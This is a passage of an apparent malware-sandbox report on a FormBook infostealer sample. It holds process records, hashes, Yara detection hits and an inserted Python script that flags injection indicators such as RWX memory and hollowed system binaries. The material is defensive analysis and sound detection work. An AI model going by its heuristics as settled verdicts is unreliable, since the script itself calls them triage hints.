• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.776363744.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.776524583.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.776620878.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.776945526.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.774394805.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.774870896.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.774740375.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 44%, Metadefender
• Detection: 66%, ReversingLabs
Reputation: low

General

Start time: 06:30:36
Start date: 12/05/2021
Path: C:\Users\Public\Citvon\Citvon.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\Public\Citvon\Citvon.exe'
Imagebase: 0x400000
File size: 721408 bytes
MD5 hash: 4E71F90D1817F44313F4E101EF393968
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Yara matches:
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.794009092.0000000003CD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.793842362.0000000003CD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.792672644.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.791925004.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.793060027.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.793181479.0000000003CD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.794640996.0000000003CD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.794191369.0000000003CD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.792747836.0000000003CD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.793593765.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.794887190.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.791822656.0000000003CD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.794518867.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.795084927.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.792171644.0000000003CD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.794111065.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.792024075.0000000003CD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.793496729.0000000003CD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.794375014.0000000003CD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.793721706.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.793652322.0000000003CD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.792344973.0000000003CD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.792856444.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.795208960.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.793342205.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.793928803.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.792257287.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.792959972.0000000003CD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.792094708.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.792418310.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.792530901.0000000003CD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.794288612.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.795419491.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
Reputation: low

                                                                        General

                                                                        Start time:06:31:02
                                                                        Start date:12/05/2021
                                                                        Path:C:\Users\Public\Citvon\Citvon.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Users\Public\Citvon\Citvon.exe
                                                                        Imagebase:0x400000
                                                                        File size:721408 bytes
                                                                        MD5 hash:4E71F90D1817F44313F4E101EF393968
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000019.00000002.866605894.0000000000580000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000019.00000002.866605894.0000000000580000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000019.00000002.866605894.0000000000580000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000019.00000002.867284740.00000000008D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000019.00000002.867284740.00000000008D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000019.00000002.867284740.00000000008D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000019.00000002.865473652.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000019.00000002.865473652.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000019.00000002.865473652.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000019.00000001.796805895.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000019.00000001.796805895.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000019.00000001.796805895.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        General

                                                                        Start time:06:31:07
                                                                        Start date:12/05/2021
                                                                        Path:C:\Windows\explorer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:
                                                                        Imagebase:0x7ff6fee60000
                                                                        File size:3933184 bytes
                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000001A.00000000.833193136.000000000A6D7000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        Reputation:high

                                                                        General

                                                                        Start time:06:31:11
                                                                        Start date:12/05/2021
                                                                        Path:C:\Users\Public\Citvon\Citvon.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Users\Public\Citvon\Citvon.exe
                                                                        Imagebase:0x400000
                                                                        File size:721408 bytes
                                                                        MD5 hash:4E71F90D1817F44313F4E101EF393968
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000002.826581239.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000002.826581239.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000002.826581239.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000002.826744888.00000000004B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000002.826744888.00000000004B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000002.826744888.00000000004B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000001.815038206.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000001.815038206.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000001.815038206.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000002.827144868.00000000005C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000002.827144868.00000000005C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000002.827144868.00000000005C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        General

                                                                        Start time:06:31:13
                                                                        Start date:12/05/2021
                                                                        Path:C:\Windows\SysWOW64\WWAHost.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\SysWOW64\WWAHost.exe
                                                                        Imagebase:0x1340000
                                                                        File size:829856 bytes
                                                                        MD5 hash:370C260333EB3149EF4E49C8F64652A0
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.916527302.0000000001270000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.916527302.0000000001270000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.916527302.0000000001270000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.915615898.0000000000E50000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.915615898.0000000000E50000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.915615898.0000000000E50000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.916659708.00000000012A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.916659708.00000000012A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.916659708.00000000012A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:moderate

                                                                        General

                                                                        Start time:06:31:32
                                                                        Start date:12/05/2021
                                                                        Path:C:\Windows\SysWOW64\autoconv.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\SysWOW64\autoconv.exe
                                                                        Imagebase:0x1190000
                                                                        File size:851968 bytes
                                                                        MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Start time:06:31:32
                                                                        Start date:12/05/2021
                                                                        Path:C:\Windows\SysWOW64\autofmt.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\SysWOW64\autofmt.exe
                                                                        Imagebase:0x890000
                                                                        File size:831488 bytes
                                                                        MD5 hash:7FC345F685C2A58283872D851316ACC4
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Start time:06:31:33
                                                                        Start date:12/05/2021
                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\SysWOW64\msiexec.exe
                                                                        Imagebase:0xb60000
                                                                        File size:59904 bytes
                                                                        MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000020.00000002.867119537.0000000000310000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000020.00000002.867119537.0000000000310000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000020.00000002.867119537.0000000000310000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
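The process records above show the usual FormBook pattern: the dropped copy in C:\Users\Public\Citvon runs as a 32-bit process, explorer.exe is touched, and several Microsoft binaries under C:\Windows\SysWOW64 (WWAHost.exe, msiexec.exe) are started with nothing but their own path and then carry FormBook Yara hits in memory although their files on disk are untouched. The following Python script is an added example, not part of the Joe Sandbox report and not Joe Sandbox code: it parses "General" process records in the layout shown above and applies the triage checks a responder would run on such a chain. The sample text inside it is a constructed, shortened copy of three records from this report. It assumes that the fourth dot-separated field of a .sdmp dump name is the region base address and the fifth is the Win32 page protection of the dumped region (0x40 = PAGE_EXECUTE_READWRITE); that layout is inferred from the names, not documented on this page, and the user-writable directory list is a hypothetical starting set.

```python
"""Added example (not part of the report or of Joe Sandbox): parse the
'General' process records of a Joe Sandbox report and triage them for a
FormBook-style injection chain.  Assumptions are marked in comments."""
import re
from dataclasses import dataclass, field

# Constructed, shortened copy of three records from the report above.
SAMPLE_REPORT = r"""
General

Start time:06:31:02
Path:C:\Users\Public\Citvon\Citvon.exe
Wow64 process (32bit):true
Commandline:C:\Users\Public\Citvon\Citvon.exe
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000019.00000002.866605894.0000000000580000.00000040.00000001.sdmp, Author: Joe Security
Reputation:low

General

Start time:06:31:07
Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:
Yara matches:
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000001A.00000000.833193136.000000000A6D7000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
Reputation:high

General

Start time:06:31:33
Path:C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\msiexec.exe
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000020.00000002.867119537.0000000000310000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000020.00000002.867119537.0000000000310000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
"""

# Yara bullet: "Rule: <name>, Description: ..., Source: <dump>, Author: ..."
RULE_RE = re.compile(r"Rule:\s*(?P<rule>[^,]+),.*?Source:\s*(?P<src>\S+),")

# Hypothetical starting list of staging directories a user can write to.
USER_WRITABLE = ("c:\\users\\public\\", "\\appdata\\local\\temp\\", "c:\\programdata\\")
FORMBOOK_RULES = {"joesecurity_formbook", "formbook_1", "formbook"}
PAGE_EXECUTE_READWRITE = 0x40   # Win32 memory protection constant


@dataclass
class ProcRecord:
    path: str = ""
    cmdline: str = ""
    wow64: bool = False
    start: str = ""
    yara: list = field(default_factory=list)   # (rule name, dump source)


def parse_report(text):
    """Split the report into ProcRecord objects, one per 'General' block."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "General":
            cur = ProcRecord()
            records.append(cur)
            continue
        if cur is None or not line:
            continue
        if line.startswith("•"):                     # Yara match bullet
            m = RULE_RE.search(line)
            if m:
                cur.yara.append((m.group("rule").strip(), m.group("src")))
            continue
        key, sep, val = line.partition(":")          # "Key:value" rows
        if not sep:
            continue
        key, val = key.strip().lower(), val.strip()
        if key == "path":
            cur.path = val
        elif key == "commandline":
            cur.cmdline = val
        elif key.startswith("wow64"):
            cur.wow64 = (val == "true")
        elif key == "start time":
            cur.start = val
    return records


def dump_region(src):
    """Return (base address, page protection) from a .sdmp dump name.
    ASSUMPTION: field 4 is the region base and field 5 the Win32 page
    protection; inferred from the names on the page, not documented there."""
    parts = src.split(".")
    if len(parts) < 6:
        return None, None
    try:
        return int(parts[3], 16), int(parts[4], 16)
    except ValueError:
        return None, None


def triage(records):
    """Return {path: sorted reason codes} for every record worth a look."""
    out = {}
    for r in records:
        p = r.path.lower()
        reasons = set()
        fb_dumps = [src for rule, src in r.yara if rule.lower() in FORMBOOK_RULES]
        if any(d in p for d in USER_WRITABLE):
            reasons.add("user_writable_path")            # dropped/staged copy
        if p.startswith("c:\\windows\\") and fb_dumps:
            reasons.add("system_binary_formbook_memory")  # file clean, memory not
        if p.startswith("c:\\windows\\") and r.cmdline.strip().lower() == p:
            reasons.add("bare_launch")                    # hollowed host pattern
        for src in fb_dumps:
            _, prot = dump_region(src)
            if prot is not None and prot & 0xFF == PAGE_EXECUTE_READWRITE:
                reasons.add("rwx_payload")                # unpacked code in RWX region
        if reasons:
            out[r.path] = sorted(reasons)
    return out


if __name__ == "__main__":
    for path, reasons in triage(parse_report(SAMPLE_REPORT)).items():
        print(f"{path}: {', '.join(reasons)}")
```

The script does not flag explorer.exe: its command line is empty (normal for the shell) and its only Yara hit is a .URL-persistence methodology rule in a PAGE_READWRITE region, so the injection into explorer.exe that the report's "System process connects to network" signature reports is not visible from these records alone. Treat the reason codes as triage hints for the memory dumps listed in each record, not as a verdict.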

                                                                        Disassembly

                                                                        Code Analysis
